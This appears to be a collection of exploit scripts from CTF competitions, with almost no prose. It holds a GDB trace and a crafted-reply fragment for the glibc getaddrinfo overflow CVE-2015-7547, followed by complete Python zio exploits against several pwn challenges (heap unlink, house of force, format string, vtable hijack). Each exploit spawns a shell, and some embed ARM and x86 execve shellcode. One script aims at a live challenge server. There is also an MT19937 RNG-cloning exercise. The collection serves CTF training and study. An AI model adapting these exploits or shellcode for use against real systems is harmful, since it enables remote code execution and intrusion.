CVE-2015-7547

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
=> 0x8048573 <main+72>:	call   0x8048420 <getaddrinfo@plt>
=> 0xb7ed9c40 <__GI_getaddrinfo>: push ebp
Breakpoint 1, __GI_getaddrinfo (name=0x8048643 "bigtang.org",
service=0x8048640 "22", hints=0xbffff04c, pai=0xbffff044)
at ../sysdeps/posix/getaddrinfo.c:2323

=> 0xb7ed9d23 <__GI_getaddrinfo+227>: call 0xb7ed7470 <gaih_inet>
=> 0xb7ed7470 <gaih_inet>: push ebp
Breakpoint 2, gaih_inet (name=0x8048643 "bigtang.org", service=0xbfffef80,
req=0xbffff04c, pai=0xbfffef70, naddrs=0xbfffef7c)
at ../sysdeps/posix/getaddrinfo.c:275

=> 0xb7ed80c7 <gaih_inet+3159>: call edi
=> 0xb7def4d0 <_nss_dns_gethostbyname4_r>: push ebp
_nss_dns_gethostbyname4_r (name=0x8048643 "bigtang.org", pat=0xbfffeecc,
buffer=0xbfffe9e0 "\377\002", buflen=0x420, errnop=0xbfffeed0,
herrnop=0xbfffeedc, ttlp=0x0) at nss_dns/dns-host.c:284

=> 0xb7def58b <_nss_dns_gethostbyname4_r+187>: call 0xb7dedb70 <__libc_res_nsearch@plt>
=> 0xb7ddb240 <__GI___libc_res_nsearch>: push ebp
__GI___libc_res_nsearch (statp=0xb7fc1340 <_res>, name=0x8048643 "bigtang.org",
class=0x1, type=0xf371,
answer=0xbfffe150 "\207C\371VcX\276\070\363\004\016", anslen=0x800,
answerp=0xbfffe97c, answerp2=0xbfffe980, nanswerp2=0xbfffe984,
resplen2=0xbfffe988, answerp2_malloced=0xbfffe98c) at res_query.c:342

=> 0xb7ddb4c6 <__GI___libc_res_nsearch+646>:
call 0xb7ddaeb0 <__libc_res_nquerydomain>
=> 0xb7ddaeb0 <__libc_res_nquerydomain>: push ebp
__libc_res_nquerydomain (statp=statp@entry=0xb7fc1340 <_res>,
name=name@entry=0x8048643 "bigtang.org", domain=0x0, class=0x1,
type=0xf371, answer=0xbfffe150 "\207C\371VcX\276\070\363\004\016",
anslen=0x800, answerp=0xbfffe97c, answerp2=0xbfffe980,
nanswerp2=0xbfffe984, resplen2=0xbfffe988, answerp2_malloced=0xbfffe98c)
at res_query.c:563

=> 0xb7ddaf9c <__libc_res_nquerydomain+236>:
call 0xb7dda7f0 <__GI___libc_res_nquery>
=> 0xb7dda7f0 <__GI___libc_res_nquery>: push ebp
__GI___libc_res_nquery (statp=0xb7fc1340 <_res>, name=0x8048643 "bigtang.org",
class=0x1, type=0xf371,
answer=0xbfffe150 "\207C\371VcX\276\070\363\004\016", anslen=0x800,
answerp=0xbfffe97c, answerp2=0xbfffe980, nanswerp2=0xbfffe984,
resplen2=0xbfffe988, answerp2_malloced=0xbfffe98c) at res_query.c:124
124 in res_query.c

=> 0xb7dda969 <__GI___libc_res_nquery+377>: movzx ecx,BYTE PTR [edi+0x3]
EAX: 0xbfffe980 ('B' <repeats 200 times>...)
EBX: 0xb7dea000 --> 0x14ed4
ECX: 0xbfffe980 ('B' <repeats 200 times>...)
EDX: 0x42424242 ('BBBB')
ESI: 0xb7fc1340 --> 0x5
EDI: 0x42424242 ('BBBB')
EBP: 0xbfffd7f8 --> 0x0
ESP: 0xbfffd550 --> 0x16b04
EIP: 0xb7dda969 (<__GI___libc_res_nquery+377>: movzx ecx,BYTE PTR [edi+0x3])


EAX: 0xbfffe980 ("fA;5A;"...)

EBX: 0xb7dea000 --> 0x14ed4
ECX: 0xbfffe980 ("fA;5A;"...)
EDX: 0x353b4166 ('fA;5')
ESI: 0xb7fc1340 --> 0x5
EDI: 0x3b414a3b (';JA;')
EBP: 0xbfffd7f8 --> 0x0
ESP: 0xbfffd550 --> 0x11035
EIP: 0xb7dda969 (<__GI___libc_res_nquery+377>: movzx ecx,BYTE PTR [edi+0x3])

0x353b4166 2090 0x3b414a3b 2094

EAX: 0x0

EBX: 0x42424242 ('BBBB')
ECX: 0xb7fbe858 --> 0x804b000 --> 0x0
EDX: 0x0
ESI: 0x42424242 ('BBBB')
EDI: 0x42424242 ('BBBB')
EBP: 0x42424242 ('BBBB')
ESP: 0xbfffe9c0 --> 0x8044242
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xbfffe9c0 --> 0x8044242
0004| 0xbfffe9c4 --> 0xbfffeecc --> 0xbfffee10 --> 0x0
0008| 0xbfffe9c8 --> 0xbfffe9e0 --> 0x2ff
0012| 0xbfffe9cc --> 0x420
0016| 0xbfffe9d0 --> 0xbfffeed0 --> 0xb ('\x0b')
0020| 0xbfffe9d4 --> 0xbfffeedc --> 0x2
0024| 0xbfffe9d8 --> 0x0
0028| 0xbfffe9dc --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()


if data2:
data = ''
data += dw(id2)
#data += '\x00' * (2300)
data += 'A'*38
data += dd(0)+dd(0x31000000)
data += 'A'*(2090-46)
data += dd(0x08b00408)+dd(0x38b00408)
data += 'B'*62
data2_reply = dw(len(data)) + data

BCTF-2016-ruin

Download:ruin.7b694dc96bf316a40ff7163479850f78 ruin.idb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
from zio import *

io = zio(("127.0.0.1",2333),print_read=RAW,print_write=RAW)
#io = zio(("166.111.132.49",9999))

printf_plt = 0x8594
printf_got = 0x00010F58
printf_off = 0x385c0

atoi_got = 0x10f80
system_off = 0x2e7c8

def checkKey(key):
io.read_until("please input your 8-bit key:")
io.write(key)

def updateKey(key):
io.read_until("Give me your choice(1-4):")
io.writeline("1")
io.read_until("enter the new 16-bit key:")
io.write(key)

def editSecret(secret):
io.read_until("Give me your choice(1-4):")
io.writeline("2")
io.read_until("please input your secret:")
io.writeline(secret)

def signName(name):
io.read_until("Give me your choice(1-4):")
io.writeline("3")
io.read_until("please input your name length:")
io.writeline(name)

def leakHeap():
checkKey("bigtang!")
io.read_until("bigtang!")
addr = io.read_until(' is')[:-3]
addr = addr.ljust(4,'\x00')
heap = l32(addr)-0x8
if heap:
print "\n[+] Got Heap base: %x" % heap
return heap

def leakLibc(heap):
checkKey("security")

# house of force
editSecret(l32(0xffffffff).rjust(0x10,'\x00'))

signName(str(0x10fa0-(heap+0x10)))
updateKey((l32(atoi_got)+l32(0)+l32(atoi_got)).rjust(0x10,'\x00'))
updateKey(l32(printf_plt).ljust(0x10,'\x00'))
#raw_input()
io.read_until("Give me your choice(1-4):")
io.writeline("%6$s"+l32(printf_got))
libc = l32(io.read(4)) - printf_off - 1
print "\n[+] Got Libc base: %x" % libc
return libc

heap = leakHeap()
libc = leakLibc(heap)
system = libc + system_off
#editSecret(l32(libc+0x2e36c))
editSecret(l32(system))
#raw_input()
io.read_until("Give me your choice(1-4):")
io.writeline("/bin/sh\x00")
#raw_input("[*] Debug:")
io.interact()

Qiangwang-Cup-2015-imdb

Download: imdb.e31f5ffcdb6571a4e672382187bc6345
imdb.idb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
from zio import *

host = "192.168.33.10"
port = 2333
io = zio((host,port),print_read=NONE,print_write=NONE)

# add a TV
def addTV(name,season,rating,introduction):
io.read_until("Your choice? ")
io.writelines(["1",name,season,rating,introduction])

# add a Movie
def addMovie(name,actors,rating,introduction):
io.read_until("Your choice? ")
io.writelines(["2",name,actors,rating,introduction])

# remove an entry
def removeEntry(name):
io.read_until("Your choice? ")
io.writelines(["3",name])

# show all TV/Movie
def showAll():
#raw_input("DEBUG:")
io.read_until("Your choice? ")
io.writeline("4")

# read any address
def readAddr(address):
addTV("a"*0x10,"0","100","f"*0x7f)
addTV("b"*0x10,"0","100","f"*0x7f)
addTV("b"*0x10,"0","100","f"*0x7f)
removeEntry("a"*0x10)
removeEntry("b"*0x10)
fakeMovie = ""
fakeMovie += l64(0x4015b0)
fakeMovie += ("b"*16).ljust(64,'\x00')
fakeMovie += ("f"*0x80)
fakeMovie += l64(0x42c80000)
fakeMovie += l64(address)
assert len(fakeMovie) == 0xd8
addMovie("a"*0x10,fakeMovie,"100","f"*0x7f)
showAll()
io.read_until("actors: ")
io.read_until("actors: ")
leak = l64(io.readline().strip().ljust(8,'\x00'))
#print "[*] Got [0x%x] 0x%x " % (address,leak)
removeEntry("a"*0x10)
removeEntry("b"*0x10)
return leak

# call any address
def callAddr(vtable,address):
addTV("a"*0x10,"0","100","f"*0x7f)
addTV("b"*0x10,"0","100","f"*0x7f)
addTV("b"*0x10,"0","100","f"*0x7f)
removeEntry("a"*0x10)
removeEntry("b"*0x10)
fakeMovie = ""
fakeMovie += l64(vtable)
fakeMovie += ("b"*16).ljust(64,'\x00')
fakeMovie += ("f"*0x80)
fakeMovie += l64(0x42c80000)
fakeMovie += l64(address)
assert len(fakeMovie) == 0xd8
addMovie("a"*0x10,fakeMovie,"100","f"*0x7f)
showAll()

heap = readAddr(0x601dc0) - 0x10
vtable = heap + 0x1c0
print "[*] Got heap 0x%x" % heap

puts = readAddr(0x601c40)
libc = puts - 0x6fe30
print "[*] Got libc_base 0x%x " % (libc)
print "[*] Got spawn_Shell 0x%x" % (libc + 0x46520)


callAddr(vtable,libc + 0x46520)

io.interact()

RCTF-2015-Quals-pwn500

Download: g27_9f47c9e9d3e7605f3bbdd4f92e51250d
g27_9f47c9e9d3e7605f3bbdd4f92e51250d.idb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
from zio import *

# create socket
host = "127.0.0.1"
port = 2333
io = zio((host,port))

# check ID
check_id = '1' * 17 + '0'
io.read_until("Input your ID to check in:\n")
io.writeline(check_id)

# enable cantin
io.read_until("choose:\n")
io.writeline('1')
io.read_until("3.CanTin\n")
io.writeline('1')
io.read_until("Which carriage?\n")
io.writeline('5')

# read access code
io.read_until("choose:\n")
io.writeline('1')
io.writeline('1')
io.writeline('0')
io.writeline("Bigtang")

# leak access code
io.read_until("choose:\n")
io.writeline('1')
io.writeline('3')
io.read_until("want?\n")
hungry = -235
io.writeline(str(hungry))
io.read_until("choose:\n")
io.writeline("4")

# open access code
io.read_until("choose:\n")
io.writeline('1')
io.read_until("3.CanTin\n")
io.writeline('1')
io.read_until("Which carriage?\n")
io.writeline('0')
io.read_until("Access code:")
io.writeline('\x58'*0x32)

# shellcode = ""
# shellcode += "\x01\x60\x8f\xe2" # add r6, pc, #1
# shellcode += "\x16\xff\x2f\xe1" # add bx r6
# shellcode += "\x40\x40" # eors r0, r0
# shellcode += "\x78\x44" # add r0, pc
# shellcode += "\x0c\x30" # adds r0, #12
# shellcode += "\x49\x40" # eors r1, r1
# shellcode += "\x52\x40" # eors r2, r2
# shellcode += "\x0b\x27" # movs r7, #11
# shellcode += "\x01\xdf" # svc 1
# shellcode += "\x01\x27" # movs r7, #1
# shellcode += "\x01\xdf" # svc 1
# shellcode += "\x2f\x2f" # .short 0x2f2f
# shellcode += "\x62\x69\x6e\x2f" # .word 0x2f6e6962
# shellcode += "\x2f\x73" # .short 0x732f
# shellcode += "\x68" # .byte 0x68

shellcode = ""
shellcode += "\x01\x30\x8f\xe2"
shellcode += "\x13\xff\x2f\xe1"
shellcode += "\x78\x46\x08\x30"
shellcode += "\x49\x1a\x92\x1a"
shellcode += "\x0b\x27\x01\xdf"
shellcode += "\x2f\x62\x69\x6e"
shellcode += "\x2f\x73\x68"

io.writeline('1')
io.writeline(shellcode)
#raw_input("Debug")
#io.writeline("whoami")
io.interact()

Practice-2016-heap-unlink

Download: heap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from zio import *

#io = zio('./heap')
io = zio(('127.1',6666))

def Add_chunk(length):
io.writeline('1')
io.read_until('Input the size of chunk you want to add:')
io.writeline(str(length))

def Set_chunk(index,data):
io.writeline('2')
io.read_until('Set chunk index:')
io.writeline(str(index))
io.read_until('Set chunk data:')
io.write(data)

def Delete_chunk(index):
io.writeline('3')
io.read_until('Delete chunk index:')
io.writeline(str(index))

def Print_chunk(index):
io.writeline('4')
io.read_until('Print chunk index:')
io.writeline(str(index))

Add_chunk(0x80)
Add_chunk(0x80)
Add_chunk(0x80)

ptr = 0x8049d60
fd = ptr - 0xc
bk = ptr - 0x8
payload = ''
payload += l32(0) + l32(0x89) + l32(fd) + l32(bk) + 'A'*(0x80-4*4)
payload += l32(0x80) + l32(0x88)
Set_chunk(0, payload)
Set_chunk(2, '/bin/sh'.ljust(0x80,'\0'))
Delete_chunk(1)

free_got = 0x8049ce8
payload = l32(0)*3 + l32(free_got)
Set_chunk(0, payload)

Print_chunk(0)
system = l32(io.read(4)) - 0xf75afc60 + 0xf7579190
Set_chunk(0, l32(system))

Delete_chunk(2)
io.interact()

0CTF-2015-Quals-freenote-x64

Download: freenote_x64

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
from zio import *

host = '127.0.0.1'
port = 10001
#target = (host,port)
target = './freenote_x64'

io = zio(target,timeout=2333,print_read=COLORED(REPR,"yellow"),print_write=COLORED(REPR,"red"))

def List_Note():
io.read_until('Your choice: ')
io.writeline('1')

def New_Note(note):
io.read_until('Your choice: ')
io.writeline('2')
io.read_until('Length of new note: ')
io.writeline(str(len(note)))
io.read_until('Enter your note: ')
io.write(note)

def Edit_Note(num,note):
io.read_until('Your choice: ')
io.writeline('3')
io.read_until('Note number: ')
io.writeline(str(num))
io.read_until('Length of note: ')
io.writeline(str(len(note)))
io.read_until('Enter your note: ')
io.writeline(note)

def Delete_Note(num):
io.read_until('Your choice: ')
io.writeline('4')
io.read_until('Note number: ')
io.writeline(str(num))

def Exit():
io.read_until('Your choice: ')
io.writeline('5')

io.gdb_hint([0x400b14])

# leak libc
New_Note('a'*0x10)
New_Note('b'*0x10)
New_Note('c'*0x10)
New_Note('d'*0x10)
Delete_Note(0)
Delete_Note(2)
New_Note('e'*0x8)
New_Note('f'*0x8)
List_Note()
io.read_until('e'*0x8)
heap_base = l64(io.read_until('\n').strip().ljust(8,'\x00'))
io.read_until('f'*0x8)
libc_base = l64(io.read_until('\n').strip().ljust(8,'\x00'))
Delete_Note(3)
Delete_Note(2)
Delete_Note(1)
Delete_Note(0)

system = libc_base + 0x7fde9b68f4f0 - 0x7fde9b9f1678
bin_sh = libc_base + 0x7fde9b7af160 - 0x7fde9b9f1678
heap = heap_base - 0x1940
print hex(system)
print hex(heap)


fd = heap + 0x30 - 0x8*3
bk = heap + 0x30 - 0x8*2
payload = ''
payload += l64(0) + l64(0x81)
payload += l64(fd) + l64(bk)
payload += 'A'*(0x80-0x20)
payload += l64(0x80) + l64(0x90)
payload += 'B'*0x80
payload += l64(0) + l64(0x91)
#payload += 'C'*(0x20)
print len(payload)
New_Note(payload)
Delete_Note(1)

free_got = 0x602018
payload2 = ''
payload2 += l64(3)
payload2 += l64(1) + l64(8) + l64(bin_sh)
payload2 += l64(1) + l64(8) + l64(free_got)
payload2 += 'C'*(len(payload)-len(payload2))
Edit_Note(0,payload2)
#List_Note()
Edit_Note(1,l64(system))
#List_Note()
Delete_Note(0)

io.interact()

0CTF-2015-Quals-freenote-x86

Download: freenote_x86

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
from zio import *

host = '127.0.0.1'
port = 10001
target = (host,port)
#target = './freenote_x86'

io = zio(target,timeout=2333)#,print_read=NONE,print_write=NONE)

def List_Note():
io.read_until('Your choice: ')
io.writeline('1')

def New_Note(note):
io.read_until('Your choice: ')
io.writeline('2')
io.read_until('Length of new note: ')
io.writeline(str(len(note)))
io.read_until('Enter your note: ')
io.write(note)

def Edit_Note(num,note):
io.read_until('Your choice: ')
io.writeline('3')
io.read_until('Note number: ')
io.writeline(str(num))
io.read_until('Length of note: ')
io.writeline(str(len(note)))
io.read_until('Enter your note: ')
io.writeline(note)

def Delete_Note(num):
io.read_until('Your choice: ')
io.writeline('4')
io.read_until('Note number: ')
io.writeline(str(num))

def Exit():
io.read_until('Your choice: ')
io.writeline('5')

#io.gdb_hint([0x08048860])

# leak libc
New_Note('a'*0x10)
New_Note('b'*0x10)
New_Note('c'*0x10)
New_Note('d'*0x10)
Delete_Note(0)
Delete_Note(2)
New_Note('e'*0x4)
New_Note('f'*0x4)
List_Note()
io.read_until('eeee')
heap_base = l32(io.read(4))
io.read_until('ffff')
libc_base = l32(io.read(4))
Delete_Note(3)
Delete_Note(2)
Delete_Note(1)
Delete_Note(0)

system = libc_base + 0xf759a360 - 0xf7702450
bin_sh = libc_base + 0xf76b91a9 - 0xf7702450
heap = heap_base - 0xd28
print hex(heap)
List_Note()

fd = heap + 0x18 - 0xc
bk = heap + 0x18 - 0x8
payload = ''
payload += l32(0) + l32(0x81)
payload += l32(fd) + l32(bk)
payload += 'A'*(0x80-0x10)
payload += l32(0x80) + l32(0x88)
payload += 'B'*0x80
payload += l32(0) + l32(0x89) #+ 'C'*0x60
#Exit()

New_Note(payload)
Delete_Note(1)

free_got = 0x0804a29c
payload2 = ''
payload2 += l32(3)
payload2 += l32(1) + l32(4) + l32(bin_sh)
payload2 += l32(1) + l32(4) + l32(free_got)
payload2 += 'C'*(len(payload)-len(payload2))
Edit_Note(0,payload2)
#List_Note()
Edit_Note(1,l32(system))
#List_Note()
Delete_Note(0)

io.interact()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
gdb-peda$ x/20wx 0x96cf000
0x96cf000: 0x00000000 0x00000c19 0x00000100 0x00000003
0x96cf010: 0x00000001 0x00000080 0x096cfc20 0x00000001
0x96cf020: 0x00000080 0x096cfca8 0x00000001 0x00000080
0x96cf030: 0x096cfd30 0x00000000 0x00000000 0x096cfdb8

gdb-peda$ x/110wx 0x96cfc18
0x96cfc18: 0x00000000 0x00000089 0x41414141 0x41414141
0x96cfc28: 0x41414141 0x41414141 0x41414141 0x41414141
0x96cfc38: 0x41414141 0x41414141 0x41414141 0x41414141
0x96cfc48: 0x41414141 0x41414141 0x41414141 0x41414141
0x96cfc58: 0x41414141 0x41414141 0x41414141 0x41414141
0x96cfc68: 0x41414141 0x41414141 0x41414141 0x41414141
0x96cfc78: 0x41414141 0x41414141 0x41414141 0x41414141
0x96cfc88: 0x41414141 0x41414141 0x41414141 0x41414141
0x96cfc98: 0x41414141 0x41414141 0x00000088 0x00000089
0x96cfca8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcb8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcc8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcd8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfce8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcf8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd08: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd18: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd28: 0x00000000 0x00000089 0x43434343 0x43434343
0x96cfd38: 0x43434343 0x43434343 0x43434343 0x43434343
0x96cfd48: 0x43434343 0x43434343 0x43434343 0x43434343
0x96cfd58: 0x43434343 0x43434343 0x43434343 0x43434343
0x96cfd68: 0x43434343 0x43434343 0x43434343 0x43434343
0x96cfd78: 0x43434343 0x43434343 0x43434343 0x43434343
0x96cfd88: 0x43434343 0x43434343 0x43434343 0x43434343
0x96cfd98: 0x43434343 0x43434343 0x43434343 0x43434343
0x96cfda8: 0x43434343 0x43434343 0x00000198 0x00020251

gdb-peda$ x/20wx 0x96cf000
0x96cf000: 0x00000000 0x00000c19 0x00000100 0x00000001
0x96cf010: 0x00000001 0x00000180 0x096cfc20 0x00000000
0x96cf020: 0x00000000 0x096cfca8 0x00000000 0x00000000
0x96cf030: 0x096cfd30 0x00000000 0x00000000 0x096cfdb8

gdb-peda$ x/110wx 0x96cfc18
0x96cfc18: 0x00000000 0x00000189 0x00000000 0x00000081
0x96cfc28: 0x096cf00c 0x096cf010 0x42424242 0x42424242
0x96cfc38: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfc48: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfc58: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfc68: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfc78: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfc88: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfc98: 0x42424242 0x42424242 0x00000080 0x00000088
0x96cfca8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcb8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcc8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcd8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfce8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcf8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd08: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd18: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd28: 0x00000000 0x00000089 0x42424242 0x42424242
0x96cfd38: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd48: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd58: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd68: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd78: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd88: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd98: 0x42424242 0x42424242 0x43434343 0x00020261
0x96cfda8: 0x43434343 0x43434343 0x00000198 0x00020251

Pwnable.kr-brainfuck

Download: bf bf_libc.so

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from zio import *

offset_gets = 0x66e50
offset_fgets = 0x65bc0
offset_system = 0x3f250
main = 0x08048671

target = ('pwnable.kr',9001)
io = zio(target,timeout=100000,print_read=COLORED(REPR,"yellow"),\
print_write=COLORED(REPR,"red"))
io.read_until('[ ]\n')

payload = ''
payload += '<'*(0xa0-0x10)
payload += '.>.>.>.'
payload += '<<<'
payload += ',>,>,>,>'
payload += '>'*24
payload += ',>,>,>,>'
payload += ',>,>,>,>.'

#io.gdb_hint([0x8048655])

io.writeline(payload)
fgets = l32(io.read(4))
#print hex(fgets)
system = fgets-offset_fgets+offset_system
gets = fgets-offset_fgets+offset_gets

io.write(l32(system))
io.write(l32(gets))
io.write(l32(main))
io.writeline('/bin/sh\x00')
io.interact()

Clone_an_MT19937_RNG_from_its_output

Problem : Clone_an_MT19937_RNG_from_its_output

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/usr/bin/env python
# Written against python 3.3.1
# Matasano Problem 21,22
# Implement the MT19937 Mersenne Twister RNG
# generated from code on the wikipedia

class MT19937:
def __init__(self, seed):
self.MT = [0] * 624;
self.index = 0;
self.seed = 0;
self.initialize_generator(seed);

def initialize_generator(self, seed):
i = 0;
self.MT[0] = seed;
for i in range(1, 624):
self.MT[i] = 0xffffffff & (0x6c078965 * (self.MT[i-1] ^ (self.MT[i-1] >> 30)) + i);

def extract_number(self):
if (self.index == 0):
self.generate_numbers();

y = self.MT[self.index];
y = y ^ (y >> 11);
y = y ^ ((y << 7) & 0x9d2c5680);
y = y ^ ((y << 15) & 0xefc60000);
y = y ^ (y >> 18);

self.index = (self.index+1)%624
return y;

def generate_numbers(self):
for i in range(624):
y = (self.MT[i] & 0x80000000) + (self.MT[(i+1)%624] & 0x7fffffff);
self.MT[i] = self.MT[(i+397)%624] ^ (y >> 1);
if ((y%2) != 0):
self.MT[i] = self.MT[i] ^ 0x9908b0df;

def temper(y):
y = y ^ (y >> 11);
y = y ^ ((y << 7) & 0x9d2c5680);
y = y ^ ((y << 15) & 0xefc60000);
y = y ^ (y >> 18);
return y;

def untemper(y):
y3 = (y & 0xffffc000);
y3 |= ((y >> 18) ^ (y&0x3fff));
y2 = (y3 & 0x1039ffff);
y2 |= ((y3 ^ ((y2 << 15) & 0xefc60000)) & 0xfffe0000);
y1 = y2 & 0x7f;
y1 |= ((((y1 << 7) & 0x9d2c5680) ^ y2) & (0x7f << 7));
y1 |= ((((y1 << 7) & 0x9d2c5680) ^ y2) & (0x7f << 14));
y1 |= ((((y1 << 7) & 0x9d2c5680) ^ y2) & (0x7f << 21));
y1 |= ((((y1 << 7) & 0x9d2c5680) ^ y2) & 0xf0000000);
y0 = (y1 & 0xffe00000);
y0 |= (((y0 >> 11) ^ y1) & 0x001ffc00);
y0 |= (((y0 >> 11) ^ y1) & 0x3ff);

return y0;

def cloneMT(dolly):
clone = MT19937(0);
for i in range(624):
clone.MT[i] = untemper(dolly.extract_number());
return clone;


if __name__ == "__main__":
dolly = MT19937(8675309);
clone = cloneMT(dolly);
for i in range(100):
print(dolly.extract_number(),clone.extract_number());
print("Clone succeeded");

PlaidCTF-2015-Quals-ebp

Download: ebp_a96f7231ab81e1b0d7fe24d660def25a.elf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from zio import *

shellcode = ( # /bin/sh shellcode at http://shell-storm.org/shellcode/files/shellcode-236.php
"\x6a\x0b\x58\x99\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x54"
"\x5b\x52\x53\x54\x59\x0f\x34"
)

io = zio(('127.0.0.1',2333),timeout=2333)
#raw_input()
io.writeline("%4$x")
ebp = (int(io.read(8),16)-0x1c) & 0xffff
print "[+] Leaked Address: ", hex(ebp)

io.writeline("%"+str(ebp)+"x%4$hn")
io.writeline(shellcode+"%"+str(0xa480-len(shellcode))+"x%"+str(12)+"$hn")
io.interact()